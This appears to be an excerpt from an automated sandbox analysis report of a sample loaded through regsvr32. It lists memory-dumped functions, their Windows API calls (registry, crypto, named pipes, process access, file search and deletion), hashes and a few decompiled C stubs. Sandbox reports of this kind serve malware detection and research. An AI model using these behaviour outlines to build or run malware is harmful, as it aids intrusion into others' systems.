                Function 04BD7341 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BCBC31: RegQueryValueExA.KERNELBASE(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,00000003,00000000,?,00000000,?,04BDE5BD,04BDE5BD,?,04BD6019,00000000), ref: 04BCBC69
                  • Part of subcall function 04BCBC31: RtlAllocateHeap.NTDLL(00000000,04BD6019), ref: 04BCBC7D
                  • Part of subcall function 04BCBC31: RegQueryValueExA.ADVAPI32(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BCBC97
                  • Part of subcall function 04BCBC31: RegCloseKey.ADVAPI32(?,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BCBCC1
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,04BD4930,04BE3A35,00000000,00000000), ref: 04BD73B7
                  • Part of subcall function 04BCFF8B: StrChrA.SHLWAPI(04BEE21C,0000002E,00000000,00000000,?,04BEE21C,04BD739D,00000000,00000000,00000000), ref: 04BCFF9D
                  • Part of subcall function 04BCFF8B: StrChrA.SHLWAPI(00000004,00000020,?,04BEE21C,04BD739D,00000000,00000000,00000000), ref: 04BCFFAC
                  • Part of subcall function 04BCB823: lstrlen.KERNEL32(04BC1127,?,00000000,00000000,04BC2C06,00000011,04BC1127,00000001,00000000,?,-00000008,?,04BC1127,00000000,?,?), ref: 04BCB853
                  • Part of subcall function 04BCB823: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 04BCB869
                  • Part of subcall function 04BCB823: memcpy.NTDLL(00000010,?,00000000), ref: 04BCB89F
                  • Part of subcall function 04BCB823: memcpy.NTDLL(00000010,00000000,?), ref: 04BCB8BA
                  • Part of subcall function 04BCB823: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 04BCB8D8
                  • Part of subcall function 04BCB823: GetLastError.KERNEL32 ref: 04BCB8E2
                  • Part of subcall function 04BCB823: HeapFree.KERNEL32(00000000,00000000), ref: 04BCB905
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                • String ID:
                • API String ID: 730886825-0
                • Opcode ID: 3f8c83603d5b58a6f86892007eebdb38d1fa5cb47db648f9c464ac4e0ec78e40
                • Instruction ID: d532a665d53f90e83230fddb66fd83a2c48c9d173ee0c702860a794b627ce5e0
                • Opcode Fuzzy Hash: 3f8c83603d5b58a6f86892007eebdb38d1fa5cb47db648f9c464ac4e0ec78e40
                • Instruction Fuzzy Hash: 52014871650204BFEB11DB95DD4AF9E7BACEB89714F1000AABA01AB180EA74FA01D771
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD5E07 Relevance: 1.3, APIs: 1, Instructions: 45COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • memset.NTDLL ref: 04BD5E25
                  • Part of subcall function 04BC3B19: memset.NTDLL ref: 04BC3B3F
                  • Part of subcall function 04BC3B19: memcpy.NTDLL ref: 04BC3B67
                  • Part of subcall function 04BC3B19: GetLastError.KERNEL32(00000010,00000218,04BE6D9D,00000100,?,00000318,00000008), ref: 04BC3B7E
                  • Part of subcall function 04BC3B19: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,04BE6D9D,00000100), ref: 04BC3C61
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorLastmemset$AllocateHeapmemcpy
                • String ID:
                • API String ID: 4290293647-0
                • Opcode ID: 270f7e34cd2cb4f7bf9ccf490feb579312da5e8d031558273eb892fd7c3af9db
                • Instruction ID: 4e13317abd155e3c2cbbab620a2df105bad2405ac6bb052ca059515488c4c491
                • Opcode Fuzzy Hash: 270f7e34cd2cb4f7bf9ccf490feb579312da5e8d031558273eb892fd7c3af9db
                • Instruction Fuzzy Hash: 8F01AD306013186BD731AF29D880F9B7BE8EF45718F0088AAFC4496240E3B1F9549AA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F1628 Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E031F1628(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E031F78F2( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E031F2114(_a8 + _a8);
					if(_t21 != 0) {
						E031F4AF1(_a4, _t21, _t23);
					}
					E031F2C11(_a4);
				}
				return _t21;
			}





                0x031f1630
                0x031f1637
                0x031f1639
                0x031f1648
                0x031f164f
                0x031f165e
                0x031f1662
                0x031f1669
                0x031f1669
                0x031f1671
                0x031f1676
                0x031f167b

                APIs
                • lstrlen.KERNEL32(?,?,?,00000000,?,031F5328,00000000,?,?,?,031F7675,?,056095B0), ref: 031F1639
                  • Part of subcall function 031F78F2: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,031F7307), ref: 031F792A
                  • Part of subcall function 031F78F2: memcpy.NTDLL(?,031F7307,00000010,?,?,?,?,?,?,?,?,?,?,031F1ACD,00000000,031F4F92), ref: 031F7943
                  • Part of subcall function 031F78F2: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 031F796C
                  • Part of subcall function 031F78F2: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 031F7984
                  • Part of subcall function 031F78F2: memcpy.NTDLL(00000000,031F4F92,031F7307,0000011F), ref: 031F79D6
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                • String ID:
                • API String ID: 894908221-0
                • Opcode ID: 40d9a68e571e64b10c0b8928600349a357b34b0c0e27a8d866f0d6367f9da1b5
                • Instruction ID: f8d9c44ebb04e092b2f662d4940192743e985e6cf8bf2965aff833126d83e7b2
                • Opcode Fuzzy Hash: 40d9a68e571e64b10c0b8928600349a357b34b0c0e27a8d866f0d6367f9da1b5
                • Instruction Fuzzy Hash: 84F0D07A100209BFCF11EE55DC44DDE3BADDF89660B048021FE19CA114DB71D55697A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F2BC9 Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E031F2BC9(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E031F1DCD(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E031F7178(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                0x031f2bd1
                0x031f2beb
                0x00000000
                0x031f2c07
                0x031f2be2
                0x031f2be9
                0x00000000
                0x00000000
                0x031f2c0e

                APIs
                • lstrlenW.KERNEL32(?,?,?,031F1D41,3D031F90,80000002,031F61AC,031F19CD,74666F53,4D4C4B48,031F19CD,?,3D031F90,80000002,031F61AC,?), ref: 031F2BEE
                  • Part of subcall function 031F7178: SysAllocString.OLEAUT32(031F19CD), ref: 031F7192
                  • Part of subcall function 031F7178: SysFreeString.OLEAUT32(00000000), ref: 031F71D2
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: String$AllocFreelstrlen
                • String ID:
                • API String ID: 3808004451-0
                • Opcode ID: c3c503369fff5068091f288a78f5b30965d737d25555e74e4bbf11b0cddca122
                • Instruction ID: cee02f68a1a684fe9c1f391cf6953f3850a955e9a54f818dbc03f9bc859bcbd8
                • Opcode Fuzzy Hash: c3c503369fff5068091f288a78f5b30965d737d25555e74e4bbf11b0cddca122
                • Instruction Fuzzy Hash: 3DF02B3600420EBFDF16AF90DD45EAA7F6AEF18390F048425BA14580A1D772D5B2EBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F4F81 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E031F4F81(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E031F1A55(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E031F2C11(_a4);
				}
				return _t12;
			}





                0x031f4f8d
                0x031f4f92
                0x031f4f96
                0x031f4f9d
                0x031f4fa8
                0x031f4fac
                0x031f4fac
                0x031f4fb5

                APIs
                  • Part of subcall function 031F1A55: memcpy.NTDLL(00000000,00000110,?,?,?,?,031F4F92,?,031F7307,031F7307,?), ref: 031F1A8B
                  • Part of subcall function 031F1A55: memset.NTDLL ref: 031F1B00
                  • Part of subcall function 031F1A55: memset.NTDLL ref: 031F1B14
                • memcpy.NTDLL(?,031F7307,00000000,?,031F7307,031F7307,?,?,031F7307,?), ref: 031F4F9D
                  • Part of subcall function 031F2C11: RtlFreeHeap.NTDLL(00000000,00000000,031F7013,00000000,?,?,00000000), ref: 031F2C1D
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: memcpymemset$FreeHeap
                • String ID:
                • API String ID: 3053036209-0
                • Opcode ID: b53cf103f4b62675a3e065fb4641e543fa228ec0c8597d05b78cf9eb67a54f6e
                • Instruction ID: 557228cfb4ac79d119e66d73bf9de3935ae1da1e028a9773ef20c1aa6864c19f
                • Opcode Fuzzy Hash: b53cf103f4b62675a3e065fb4641e543fa228ec0c8597d05b78cf9eb67a54f6e
                • Instruction Fuzzy Hash: 72E0863A405219BBCB126A95DC00DEBBF5C9F49690F044020FF084A200D732C55097E1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCF607 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 04BCF611
                  • Part of subcall function 04BDA2DD: RegOpenKeyExA.KERNELBASE(04BCF629,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,04BCF629,80000001,?,04BDE99E), ref: 04BDA324
                  • Part of subcall function 04BDA2DD: RegOpenKeyExA.ADVAPI32(04BCF629,04BCF629,00000000,00020019,80000001,?,04BCF629,80000001,?,04BDE99E), ref: 04BDA33A
                  • Part of subcall function 04BDA2DD: RegCloseKey.ADVAPI32(80000001,80000001,?,04BDE99E,04BDE9AE,?,04BCF629,80000001,?,04BDE99E), ref: 04BDA383
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Open$Closememset
                • String ID:
                • API String ID: 1685373161-0
                • Opcode ID: aa98b2b64fa9a898baeff2053dee30706ccb1b44704b35404b482207630a9039
                • Instruction ID: c0df2491640ade761eb3138403c07756e4016db753763570a04d2aacabe09226
                • Opcode Fuzzy Hash: aa98b2b64fa9a898baeff2053dee30706ccb1b44704b35404b482207630a9039
                • Instruction Fuzzy Hash: F9E0C23520010CB7EF10AF45CC41F987718DF08348F0080A8BE0D5E682DA32F664D7D0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC95D7 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                Download Yara Rule
                APIs
                • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,04BEA5C0,0000002C,04BC5FC8,06248E36,?,00000000,04BC3B4C,?,00000318), ref: 04BC95F1
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FreeVirtual
                • String ID:
                • API String ID: 1263568516-0
                • Opcode ID: d969479d878991df9021e66e169501d4c7baca5d0553f96608c8b999ced7c3ad
                • Instruction ID: 593357a737575717f99e749618b9b98fc8239d31dbc14b71b009bb44b6b03770
                • Opcode Fuzzy Hash: d969479d878991df9021e66e169501d4c7baca5d0553f96608c8b999ced7c3ad
                • Instruction Fuzzy Hash: 90D01730D00619DBDB209B95DC8A9AEFB70FF48720F608264E86077190C7302E12CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 04BC1D70 Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON
                Download Yara Rule
                APIs
                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 04BC1DA3
                • GetLastError.KERNEL32 ref: 04BC1DB1
                • NtSetInformationProcess.NTDLL ref: 04BC1E0B
                • GetProcAddress.KERNEL32(?,00000000), ref: 04BC1E4A
                • GetProcAddress.KERNEL32(?), ref: 04BC1E6B
                • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 04BC1EC2
                • CloseHandle.KERNEL32(?), ref: 04BC1ED8
                • CloseHandle.KERNEL32(?), ref: 04BC1EFE
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                • String ID:
                • API String ID: 3529370251-0
                • Opcode ID: 20bdead82b94c57cb6f2942c44d3f92d0092b17078a1660a0a42d26bbe1acd34
                • Instruction ID: 0b9faa38681d7816f0298caa865a54e5379bc144b6f44958f4f44487d4f61a6f
                • Opcode Fuzzy Hash: 20bdead82b94c57cb6f2942c44d3f92d0092b17078a1660a0a42d26bbe1acd34
                • Instruction Fuzzy Hash: CB415A70204346DFDB109F29C884A5ABBE9FB88348F000E6EF554E7152D774EA48CF62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC3EBE Relevance: 6.1, APIs: 4, Instructions: 111stringnativeCOMMON
                Download Yara Rule
                APIs
                • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 04BC3F14
                • lstrlenW.KERNEL32(?), ref: 04BC3F22
                • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 04BC3F4D
                • lstrcpyW.KERNEL32(00000006,00000000), ref: 04BC3F7A
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Query$lstrcpylstrlen
                • String ID:
                • API String ID: 3961825720-0
                • Opcode ID: 0d0b8dc642db9bf61e7104ab4d0b03d37f4274957150225c91e64d784726a498
                • Instruction ID: e5c9fd41544e6f876f0edb78bcd6d8740ed9ab94df9f1e03b540acdfb723d834
                • Opcode Fuzzy Hash: 0d0b8dc642db9bf61e7104ab4d0b03d37f4274957150225c91e64d784726a498
                • Instruction Fuzzy Hash: 16414C71500209FFEF11DFA9C984AAEBBB8EF44304F4184AAF905A7250D775EA119BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD0782 Relevance: 42.3, APIs: 28, Instructions: 262memorystringCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL ref: 04BD07A3
                • GetTickCount.KERNEL32 ref: 04BD07BD
                • wsprintfA.USER32 ref: 04BD0810
                • QueryPerformanceFrequency.KERNEL32(?), ref: 04BD081C
                • QueryPerformanceCounter.KERNEL32(?), ref: 04BD0827
                • _aulldiv.NTDLL(?,?,?,?), ref: 04BD083D
                • wsprintfA.USER32 ref: 04BD0853
                • wsprintfA.USER32 ref: 04BD0878
                • HeapFree.KERNEL32(00000000,?), ref: 04BD088B
                • wsprintfA.USER32 ref: 04BD08AF
                • HeapFree.KERNEL32(00000000,?), ref: 04BD08C2
                • wsprintfA.USER32 ref: 04BD08FC
                • wsprintfA.USER32 ref: 04BD0920
                • lstrcat.KERNEL32(?,?), ref: 04BD0958
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04BD0972
                • GetTickCount.KERNEL32 ref: 04BD0982
                • RtlEnterCriticalSection.NTDLL(0624C0A0), ref: 04BD0996
                • RtlLeaveCriticalSection.NTDLL(0624C0A0), ref: 04BD09B4
                • StrTrimA.SHLWAPI(00000000,04BE83F8,00000000,0624C0E0), ref: 04BD09ED
                • lstrcpy.KERNEL32(00000000,?), ref: 04BD0A0F
                • lstrcpy.KERNEL32(00000000,00000000), ref: 04BD0A16
                • lstrcat.KERNEL32(00000000,?), ref: 04BD0A1D
                • lstrcat.KERNEL32(00000000,?), ref: 04BD0A24
                • HeapFree.KERNEL32(00000000,?,00000000,?,04BD7E99,?,?,00000000), ref: 04BD0A9E
                • HeapFree.KERNEL32(00000000,?,00000000), ref: 04BD0AB0
                • HeapFree.KERNEL32(00000000,00000000,00000000,0624C0E0), ref: 04BD0ABF
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BD0AD1
                • HeapFree.KERNEL32(00000000,?), ref: 04BD0AE3
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Free$wsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveTrim_aulldiv
                • String ID:
                • API String ID: 3373977504-0
                • Opcode ID: ca363a752dd9935ca2cd4ccc9e2218b6512a91619b61c00f8dc0a727c938acf2
                • Instruction ID: 36ac317a8d9ac1d47a8911537790557cf981e206bb61913910409746ccb3d188
                • Opcode Fuzzy Hash: ca363a752dd9935ca2cd4ccc9e2218b6512a91619b61c00f8dc0a727c938acf2
                • Instruction Fuzzy Hash: 96A17F71500206AFDB01EF7AEC84E6A7BE8FB88304F04446AF548DB152E779E9199F71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD7DDD Relevance: 27.3, APIs: 18, Instructions: 274memorystringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BCBC31: RegQueryValueExA.KERNELBASE(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,00000003,00000000,?,00000000,?,04BDE5BD,04BDE5BD,?,04BD6019,00000000), ref: 04BCBC69
                  • Part of subcall function 04BCBC31: RtlAllocateHeap.NTDLL(00000000,04BD6019), ref: 04BCBC7D
                  • Part of subcall function 04BCBC31: RegQueryValueExA.ADVAPI32(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BCBC97
                  • Part of subcall function 04BCBC31: RegCloseKey.ADVAPI32(?,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BCBCC1
                • HeapFree.KERNEL32(00000000,?,?,?,04BC158F,74E5F710,00000000,00000000), ref: 04BD7E24
                • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 04BD7E42
                • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?,?,?,?,?,?,04BC158F), ref: 04BD7E6E
                • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,?,00000000,?,?,04BC158F), ref: 04BD7EDC
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04BD7F54
                • wsprintfA.USER32 ref: 04BD7F70
                • lstrlen.KERNEL32(00000000,00000000), ref: 04BD7F7B
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04BD7F92
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04BD801E
                • wsprintfA.USER32 ref: 04BD8039
                • lstrlen.KERNEL32(00000000,00000000), ref: 04BD8044
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04BD805B
                • HeapFree.KERNEL32(00000000,04BC158F,?,?,00000008,0000000B,?,04BC158F,04BC158F,00000001,?,00000000,?,?,04BC158F), ref: 04BD807D
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04BD8098
                • wsprintfA.USER32 ref: 04BD80AF
                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04BC158F), ref: 04BD80BA
                  • Part of subcall function 04BCB823: lstrlen.KERNEL32(04BC1127,?,00000000,00000000,04BC2C06,00000011,04BC1127,00000001,00000000,?,-00000008,?,04BC1127,00000000,?,?), ref: 04BCB853
                  • Part of subcall function 04BCB823: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 04BCB869
                  • Part of subcall function 04BCB823: memcpy.NTDLL(00000010,?,00000000), ref: 04BCB89F
                  • Part of subcall function 04BCB823: memcpy.NTDLL(00000010,00000000,?), ref: 04BCB8BA
                  • Part of subcall function 04BCB823: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 04BCB8D8
                  • Part of subcall function 04BCB823: GetLastError.KERNEL32 ref: 04BCB8E2
                  • Part of subcall function 04BCB823: HeapFree.KERNEL32(00000000,00000000), ref: 04BCB905
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,?,04BC158F), ref: 04BD80D1
                • HeapFree.KERNEL32(00000000,?,0000001D,00000008,?,06248A20,?,?,?,?,?,?,?,?,?,04BC158F), ref: 04BD80FD
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                • String ID:
                • API String ID: 3130754786-0
                • Opcode ID: f5ea6a08fb7417fc94c312c77b7958816cc03623e491de225d9a3a70b895cc34
                • Instruction ID: fd12f8e67d1acd464826eb96f107f356a3e3698c0aa848cabca5d5ed39cd1069
                • Opcode Fuzzy Hash: f5ea6a08fb7417fc94c312c77b7958816cc03623e491de225d9a3a70b895cc34
                • Instruction Fuzzy Hash: F2A17071900209EFEB20EFA6DC84DAEBBB9FB84305F0044AAF505A7111E735AE44DB71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDC452 Relevance: 24.3, APIs: 16, Instructions: 258memorystringfileCOMMON
                Download Yara Rule
                APIs
                • lstrlenW.KERNEL32(?), ref: 04BDC467
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 04BDD3E9
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04BC39E4), ref: 04BDD3F5
                  • Part of subcall function 04BDD39D: memset.NTDLL ref: 04BDD43D
                  • Part of subcall function 04BDD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BDD458
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(0000002C), ref: 04BDD490
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(?), ref: 04BDD498
                  • Part of subcall function 04BDD39D: memset.NTDLL ref: 04BDD4BB
                  • Part of subcall function 04BDD39D: wcscpy.NTDLL ref: 04BDD4CD
                  • Part of subcall function 04BDD39D: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04BDD4F3
                  • Part of subcall function 04BDD39D: RtlEnterCriticalSection.NTDLL(?), ref: 04BDD528
                  • Part of subcall function 04BDD39D: RtlLeaveCriticalSection.NTDLL(?), ref: 04BDD544
                  • Part of subcall function 04BDD39D: FindNextFileW.KERNEL32(?,00000000), ref: 04BDD55D
                  • Part of subcall function 04BDD39D: WaitForSingleObject.KERNEL32(00000000), ref: 04BDD56F
                  • Part of subcall function 04BDD39D: FindClose.KERNEL32(?), ref: 04BDD584
                  • Part of subcall function 04BDD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BDD598
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(0000002C), ref: 04BDD5BA
                • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 04BDC4C3
                • memcpy.NTDLL(00000000,?,00000000), ref: 04BDC4D6
                • lstrcpyW.KERNEL32(00000000,?), ref: 04BDC4ED
                  • Part of subcall function 04BDD39D: FindNextFileW.KERNEL32(?,00000000), ref: 04BDD630
                  • Part of subcall function 04BDD39D: WaitForSingleObject.KERNEL32(00000000), ref: 04BDD642
                  • Part of subcall function 04BDD39D: FindClose.KERNEL32(?), ref: 04BDD65D
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 04BDC518
                • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 04BDC530
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BDC58A
                • lstrlenW.KERNEL32(00000000,?), ref: 04BDC5AD
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BDC5BF
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 04BDC633
                • HeapFree.KERNEL32(00000000,?), ref: 04BDC643
                  • Part of subcall function 04BC1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,04BDDB18,?,?,00000000,04BCC692,?,?,?,?,00000000,?), ref: 04BC1B99
                  • Part of subcall function 04BC1B8A: mbstowcs.NTDLL ref: 04BC1BB5
                • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 04BDC66C
                • lstrlenW.KERNEL32(04BEF878,?), ref: 04BDC6E6
                • DeleteFileW.KERNEL32(?,?), ref: 04BDC714
                • HeapFree.KERNEL32(00000000,?), ref: 04BDC722
                • HeapFree.KERNEL32(00000000,?), ref: 04BDC743
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                • String ID:
                • API String ID: 72361108-0
                • Opcode ID: 3717180ab8de3560b7d7df3afe8dfe8bde11e71d287b0e11efc49f80104c3208
                • Instruction ID: 6b459039128ae43027f009be355673e249af9e74047f9b65c4944f2c168073ed
                • Opcode Fuzzy Hash: 3717180ab8de3560b7d7df3afe8dfe8bde11e71d287b0e11efc49f80104c3208
                • Instruction Fuzzy Hash: 1191287160121ABFDB10DFA6DC88DAA7BBCFB88354B044496F509DB152E334EA45CB71
                Uniqueness

                Uniqueness Score: -1.00%

